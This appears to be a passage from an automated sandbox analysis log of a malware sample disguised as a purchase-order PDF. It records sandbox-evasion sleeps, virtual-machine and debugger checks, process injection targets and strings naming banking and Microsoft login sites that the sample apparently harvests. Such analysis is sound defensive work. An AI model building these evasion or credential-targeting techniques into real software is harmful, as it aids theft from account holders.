                Source: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe TID: 3716Thread sleep time: -43000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe TID: 3716Thread sleep count: 39 > 30Jump to behavior
                Source: C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe TID: 3716Thread sleep time: -58500s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\shutdown.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\shutdown.exeCode function: 7_2_026DC700 FindFirstFileW,FindNextFileW,FindClose,7_2_026DC700
                Source: shutdown.exe, 00000007.00000002.4475773652.0000000007A56000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware
                Source: New PO [FK4-7173].pdf.exe, 00000000.00000002.2016717202.00000000008A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\V
                Source: New PO [FK4-7173].pdf.exe, 00000000.00000002.2037932132.0000000009540000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: vmcI6ZuUrxlmbqYK6fl
                Source: 784DRh-0.7.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: shutdown.exe, 00000007.00000002.4475773652.0000000007A56000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: use_countINTEGERVMware
                Source: 784DRh-0.7.drBinary or memory string: discord.comVMware20,11696428655f
                Source: 784DRh-0.7.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: 784DRh-0.7.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: 784DRh-0.7.drBinary or memory string: global block list test formVMware20,11696428655
                Source: shutdown.exe, 00000007.00000002.4475773652.0000000007A56000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,
                Source: 784DRh-0.7.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: 784DRh-0.7.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: 784DRh-0.7.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: 784DRh-0.7.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: 784DRh-0.7.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: 784DRh-0.7.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: 784DRh-0.7.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: 784DRh-0.7.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: 784DRh-0.7.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                Source: 784DRh-0.7.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: shutdown.exe, 00000007.00000002.4472317980.000000000283D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 784DRh-0.7.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: 784DRh-0.7.drBinary or memory string: outlook.office.comVMware20,11696428655s
                Source: 784DRh-0.7.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: 784DRh-0.7.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: 784DRh-0.7.drBinary or memory string: AMC password management pageVMware20,11696428655
                Source: 784DRh-0.7.drBinary or memory string: tasks.office.comVMware20,11696428655o
                Source: New PO [FK4-7173].pdf.exe, 00000000.00000002.2016717202.00000000008A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: 784DRh-0.7.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: 784DRh-0.7.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: 784DRh-0.7.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                Source: 784DRh-0.7.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: 784DRh-0.7.drBinary or memory string: dev.azure.comVMware20,11696428655j
                Source: 784DRh-0.7.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: firefox.exe, 0000000A.00000002.2508701810.000001CA0C0AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllMM4GP
                Source: 784DRh-0.7.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: MKVNVRSuoK.exe, 00000009.00000002.4472932779.000000000115F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll=
                Source: 784DRh-0.7.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                Source: 784DRh-0.7.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: 784DRh-0.7.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\shutdown.exe Process queried: DebugPort
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_00417A53 LdrLoadDll,4_2_00417A53
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011DA118 mov ecx, dword ptr fs:[00000030h]4_2_011DA118
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01208324 mov eax, dword ptr fs:[00000030h]4_2_01208324
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01150310 mov ecx, dword ptr fs:[00000030h]4_2_01150310
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0116A30B mov eax, dword ptr fs:[00000030h]4_2_0116A30B
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0116A30B mov eax, dword ptr fs:[00000030h]4_2_0116A30B
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0116A30B mov eax, dword ptr fs:[00000030h]4_2_0116A30B
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011B035C mov eax, dword ptr fs:[00000030h]4_2_011B035C
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011B035C mov eax, dword ptr fs:[00000030h]4_2_011B035C
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011B035C mov eax, dword ptr fs:[00000030h]4_2_011B035C
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011B035C mov ecx, dword ptr fs:[00000030h]4_2_011B035C
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011B035C mov eax, dword ptr fs:[00000030h]4_2_011B035C
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011B035C mov eax, dword ptr fs:[00000030h]4_2_011B035C
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011FA352 mov eax, dword ptr fs:[00000030h]4_2_011FA352
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011D8350 mov ecx, dword ptr fs:[00000030h]4_2_011D8350
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011B2349 mov eax, dword ptr fs:[00000030h]4_2_011B2349
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011B2349 mov eax, dword ptr fs:[00000030h]4_2_011B2349
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011B2349 mov eax, dword ptr fs:[00000030h]4_2_011B2349
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011B2349 mov eax, dword ptr fs:[00000030h]4_2_011B2349
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011B2349 mov eax, dword ptr fs:[00000030h]4_2_011B2349
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011B2349 mov eax, dword ptr fs:[00000030h]4_2_011B2349
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011B2349 mov eax, dword ptr fs:[00000030h]4_2_011B2349
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011B2349 mov eax, dword ptr fs:[00000030h]4_2_011B2349
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011B2349 mov eax, dword ptr fs:[00000030h]4_2_011B2349
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011B2349 mov eax, dword ptr fs:[00000030h]4_2_011B2349
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011B2349 mov eax, dword ptr fs:[00000030h]4_2_011B2349
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011B2349 mov eax, dword ptr fs:[00000030h]4_2_011B2349
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011B2349 mov eax, dword ptr fs:[00000030h]4_2_011B2349
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011B2349 mov eax, dword ptr fs:[00000030h]4_2_011B2349
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011B2349 mov eax, dword ptr fs:[00000030h]4_2_011B2349
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011D437C mov eax, dword ptr fs:[00000030h]4_2_011D437C
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0120634F mov eax, dword ptr fs:[00000030h]4_2_0120634F
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01128397 mov eax, dword ptr fs:[00000030h]4_2_01128397
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01128397 mov eax, dword ptr fs:[00000030h]4_2_01128397
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01128397 mov eax, dword ptr fs:[00000030h]4_2_01128397
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0112E388 mov eax, dword ptr fs:[00000030h]4_2_0112E388
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0112E388 mov eax, dword ptr fs:[00000030h]4_2_0112E388
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0112E388 mov eax, dword ptr fs:[00000030h]4_2_0112E388
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0115438F mov eax, dword ptr fs:[00000030h]4_2_0115438F
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0115438F mov eax, dword ptr fs:[00000030h]4_2_0115438F
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011DE3DB mov eax, dword ptr fs:[00000030h]4_2_011DE3DB
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011DE3DB mov eax, dword ptr fs:[00000030h]4_2_011DE3DB
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011DE3DB mov ecx, dword ptr fs:[00000030h]4_2_011DE3DB
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011DE3DB mov eax, dword ptr fs:[00000030h]4_2_011DE3DB
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011D43D4 mov eax, dword ptr fs:[00000030h]4_2_011D43D4
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011D43D4 mov eax, dword ptr fs:[00000030h]4_2_011D43D4
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011EC3CD mov eax, dword ptr fs:[00000030h]4_2_011EC3CD
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0113A3C0 mov eax, dword ptr fs:[00000030h]4_2_0113A3C0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0113A3C0 mov eax, dword ptr fs:[00000030h]4_2_0113A3C0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0113A3C0 mov eax, dword ptr fs:[00000030h]4_2_0113A3C0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0113A3C0 mov eax, dword ptr fs:[00000030h]4_2_0113A3C0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0113A3C0 mov eax, dword ptr fs:[00000030h]4_2_0113A3C0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0113A3C0 mov eax, dword ptr fs:[00000030h]4_2_0113A3C0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011383C0 mov eax, dword ptr fs:[00000030h]4_2_011383C0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011383C0 mov eax, dword ptr fs:[00000030h]4_2_011383C0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011383C0 mov eax, dword ptr fs:[00000030h]4_2_011383C0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011383C0 mov eax, dword ptr fs:[00000030h]4_2_011383C0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011B63C0 mov eax, dword ptr fs:[00000030h]4_2_011B63C0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0114E3F0 mov eax, dword ptr fs:[00000030h]4_2_0114E3F0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0114E3F0 mov eax, dword ptr fs:[00000030h]4_2_0114E3F0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0114E3F0 mov eax, dword ptr fs:[00000030h]4_2_0114E3F0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011663FF mov eax, dword ptr fs:[00000030h]4_2_011663FF
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011403E9 mov eax, dword ptr fs:[00000030h]4_2_011403E9
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011403E9 mov eax, dword ptr fs:[00000030h]4_2_011403E9
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011403E9 mov eax, dword ptr fs:[00000030h]4_2_011403E9
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011403E9 mov eax, dword ptr fs:[00000030h]4_2_011403E9
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011403E9 mov eax, dword ptr fs:[00000030h]4_2_011403E9
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011403E9 mov eax, dword ptr fs:[00000030h]4_2_011403E9
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011403E9 mov eax, dword ptr fs:[00000030h]4_2_011403E9
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011403E9 mov eax, dword ptr fs:[00000030h]4_2_011403E9
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0112823B mov eax, dword ptr fs:[00000030h]4_2_0112823B
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0112A250 mov eax, dword ptr fs:[00000030h]4_2_0112A250
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01136259 mov eax, dword ptr fs:[00000030h]4_2_01136259
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011EA250 mov eax, dword ptr fs:[00000030h]4_2_011EA250
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011EA250 mov eax, dword ptr fs:[00000030h]4_2_011EA250
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011B8243 mov eax, dword ptr fs:[00000030h]4_2_011B8243
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011B8243 mov ecx, dword ptr fs:[00000030h]4_2_011B8243
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011E0274 mov eax, dword ptr fs:[00000030h]4_2_011E0274
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011E0274 mov eax, dword ptr fs:[00000030h]4_2_011E0274
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011E0274 mov eax, dword ptr fs:[00000030h]4_2_011E0274
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011E0274 mov eax, dword ptr fs:[00000030h]4_2_011E0274
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011E0274 mov eax, dword ptr fs:[00000030h]4_2_011E0274
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011E0274 mov eax, dword ptr fs:[00000030h]4_2_011E0274
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011E0274 mov eax, dword ptr fs:[00000030h]4_2_011E0274
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011E0274 mov eax, dword ptr fs:[00000030h]4_2_011E0274
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011E0274 mov eax, dword ptr fs:[00000030h]4_2_011E0274
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011E0274 mov eax, dword ptr fs:[00000030h]4_2_011E0274
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011E0274 mov eax, dword ptr fs:[00000030h]4_2_011E0274
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011E0274 mov eax, dword ptr fs:[00000030h]4_2_011E0274
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01134260 mov eax, dword ptr fs:[00000030h]4_2_01134260
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01134260 mov eax, dword ptr fs:[00000030h]4_2_01134260
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01134260 mov eax, dword ptr fs:[00000030h]4_2_01134260
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0112826B mov eax, dword ptr fs:[00000030h]4_2_0112826B
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0120625D mov eax, dword ptr fs:[00000030h]4_2_0120625D
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0116E284 mov eax, dword ptr fs:[00000030h]4_2_0116E284
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0116E284 mov eax, dword ptr fs:[00000030h]4_2_0116E284
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011B0283 mov eax, dword ptr fs:[00000030h]4_2_011B0283
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011B0283 mov eax, dword ptr fs:[00000030h]4_2_011B0283
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011B0283 mov eax, dword ptr fs:[00000030h]4_2_011B0283
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011402A0 mov eax, dword ptr fs:[00000030h]4_2_011402A0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011402A0 mov eax, dword ptr fs:[00000030h]4_2_011402A0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011C62A0 mov eax, dword ptr fs:[00000030h]4_2_011C62A0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011C62A0 mov ecx, dword ptr fs:[00000030h]4_2_011C62A0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011C62A0 mov eax, dword ptr fs:[00000030h]4_2_011C62A0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011C62A0 mov eax, dword ptr fs:[00000030h]4_2_011C62A0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011C62A0 mov eax, dword ptr fs:[00000030h]4_2_011C62A0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011C62A0 mov eax, dword ptr fs:[00000030h]4_2_011C62A0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0113A2C3 mov eax, dword ptr fs:[00000030h]4_2_0113A2C3
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0113A2C3 mov eax, dword ptr fs:[00000030h]4_2_0113A2C3
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0113A2C3 mov eax, dword ptr fs:[00000030h]4_2_0113A2C3
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0113A2C3 mov eax, dword ptr fs:[00000030h]4_2_0113A2C3
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0113A2C3 mov eax, dword ptr fs:[00000030h]4_2_0113A2C3
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011402E1 mov eax, dword ptr fs:[00000030h]4_2_011402E1
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011402E1 mov eax, dword ptr fs:[00000030h]4_2_011402E1
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011402E1 mov eax, dword ptr fs:[00000030h]4_2_011402E1
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_012062D6 mov eax, dword ptr fs:[00000030h]4_2_012062D6
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011C6500 mov eax, dword ptr fs:[00000030h]4_2_011C6500
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01204500 mov eax, dword ptr fs:[00000030h]4_2_01204500
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01204500 mov eax, dword ptr fs:[00000030h]4_2_01204500
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01204500 mov eax, dword ptr fs:[00000030h]4_2_01204500
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01204500 mov eax, dword ptr fs:[00000030h]4_2_01204500
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01204500 mov eax, dword ptr fs:[00000030h]4_2_01204500
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01204500 mov eax, dword ptr fs:[00000030h]4_2_01204500
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01204500 mov eax, dword ptr fs:[00000030h]4_2_01204500
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01140535 mov eax, dword ptr fs:[00000030h]4_2_01140535
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01140535 mov eax, dword ptr fs:[00000030h]4_2_01140535
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01140535 mov eax, dword ptr fs:[00000030h]4_2_01140535
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01140535 mov eax, dword ptr fs:[00000030h]4_2_01140535
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01140535 mov eax, dword ptr fs:[00000030h]4_2_01140535
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01140535 mov eax, dword ptr fs:[00000030h]4_2_01140535
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0115E53E mov eax, dword ptr fs:[00000030h]4_2_0115E53E
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0115E53E mov eax, dword ptr fs:[00000030h]4_2_0115E53E
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0115E53E mov eax, dword ptr fs:[00000030h]4_2_0115E53E
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0115E53E mov eax, dword ptr fs:[00000030h]4_2_0115E53E
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0115E53E mov eax, dword ptr fs:[00000030h]4_2_0115E53E
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01138550 mov eax, dword ptr fs:[00000030h]4_2_01138550
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01138550 mov eax, dword ptr fs:[00000030h]4_2_01138550
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0116656A mov eax, dword ptr fs:[00000030h]4_2_0116656A
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0116656A mov eax, dword ptr fs:[00000030h]4_2_0116656A
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0116656A mov eax, dword ptr fs:[00000030h]4_2_0116656A
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0116E59C mov eax, dword ptr fs:[00000030h]4_2_0116E59C
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01132582 mov eax, dword ptr fs:[00000030h]4_2_01132582
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01132582 mov ecx, dword ptr fs:[00000030h]4_2_01132582
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_01164588 mov eax, dword ptr fs:[00000030h]4_2_01164588
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011545B1 mov eax, dword ptr fs:[00000030h]4_2_011545B1
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011545B1 mov eax, dword ptr fs:[00000030h]4_2_011545B1
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011B05A7 mov eax, dword ptr fs:[00000030h]4_2_011B05A7
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011B05A7 mov eax, dword ptr fs:[00000030h]4_2_011B05A7
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011B05A7 mov eax, dword ptr fs:[00000030h]4_2_011B05A7
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_011365D0 mov eax, dword ptr fs:[00000030h]4_2_011365D0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0116A5D0 mov eax, dword ptr fs:[00000030h]4_2_0116A5D0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0116A5D0 mov eax, dword ptr fs:[00000030h]4_2_0116A5D0
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0116E5CF mov eax, dword ptr fs:[00000030h]4_2_0116E5CF
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0116E5CF mov eax, dword ptr fs:[00000030h]4_2_0116E5CF
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0115E5E7 mov eax, dword ptr fs:[00000030h]4_2_0115E5E7
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0115E5E7 mov eax, dword ptr fs:[00000030h]4_2_0115E5E7
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0115E5E7 mov eax, dword ptr fs:[00000030h]4_2_0115E5E7
                Source: C:\Users\user\Desktop\New PO [FK4-7173].pdf.exeCode function: 4_2_0115E5E7 mov eax, dword ptr fs:[00000030h]4_2_0115E5E7
